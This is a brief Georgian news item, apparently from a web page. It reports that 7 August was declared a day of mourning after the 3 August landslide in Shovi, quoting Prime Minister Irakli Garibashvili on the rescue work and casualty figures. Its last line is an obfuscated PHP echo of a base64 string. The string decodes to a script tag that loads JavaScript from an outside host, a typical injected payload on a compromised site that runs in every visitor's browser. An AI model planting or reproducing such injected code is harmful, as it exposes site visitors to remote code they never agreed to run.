celsiusi
ავერსი საქკაბელი

შოვში მომხდარი ტრაგედიის გამო, ორშაბათი, 7 აგვისტო გლოვის დღედ გამოცხადდა.

შესაბამისი გადაწყვეტილების შესახებ სტიქიის სალიკვიდაციო საგანგებო შტაბში გამართული თათბირის შემდეგ საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა განაცხადა.

„ჩვენ გვქონდა მსჯელობა, რომ დღეს და შაბათ-კვირას მუშაობას აქტიურად გააგრძელებენ და ჩვენი გადაწყვეტილებით გლოვის დღე გამოცხადდება ორშაბათს“,- განაცხადა ღარიბაშვილმა.

შეგახსენებთ, რომ შოვში, მეწყერი 3 აგვისტოს ჩამოწვა. სტიქიის ზონიდან, ამ დროისთვის, 210 ადამიანია გამოყვანილი, გარდაცვლილია 7 პირი. 

278
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");